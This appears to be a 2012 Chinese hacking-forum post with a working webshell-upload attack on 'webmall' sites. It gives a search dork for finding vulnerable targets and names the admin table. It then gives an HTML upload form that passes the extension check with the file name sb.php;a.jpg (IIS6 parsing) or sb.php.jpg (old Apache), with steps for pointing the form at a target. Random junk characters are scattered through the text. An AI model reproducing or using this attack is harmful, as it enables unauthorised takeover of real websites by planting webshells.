关键字:inurl:webmall/detail.php?id
* n: q. u$ P% R3 g3 D
+ ?0 W2 }0 x( g6 N5 z+ `数据表:pwn_base_admin. d9 y E) r1 V$ C# V% B* Z; u( r
0 d2 R7 m1 A) X& l8 `6 r* H5 W4 y2 K1 B关于拿shell! |( v2 E( [, A/ i/ C [! h2 O$ c8 q
* h9 X8 A6 k( r' Y: B3 g2 J首先登录后台admin.php- C3 B# n7 q1 n2 F) @1 |
! q7 }% g; o8 B( L* @看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
8 J9 ?4 l8 n6 N$ i- V换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
. c2 o8 G/ {0 [, m然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的% O& F. D8 I9 u" q+ _6 \
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
! S/ g$ f# X0 v- ? F% w<input type="text" name="fileName" value="sb.php;a.jpg" /> / B0 w" M0 x* j$ _0 M
<input type="hidden" name="attachPath" value="news/pics/" />
' I, M( B1 n5 K( Q o) z5 k: |7 N<input type="file" name="fileData" size="14" /></td>
; ~1 W: W; \5 k' f" ]$ k<input type="submit" name="button" value="确定" /> 8 ^+ M. e6 \) e
</form>( V! d a0 O( F5 _
5 j. C g5 I0 D5 _+ J5 M* P
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
$ A5 V m8 P2 H: ^" f* u' p' ?" U# T& A3 M# E6 N; E/ O" u7 \: D9 A
|
发表于 2012-11-9 20:52:15
收藏
支持
反对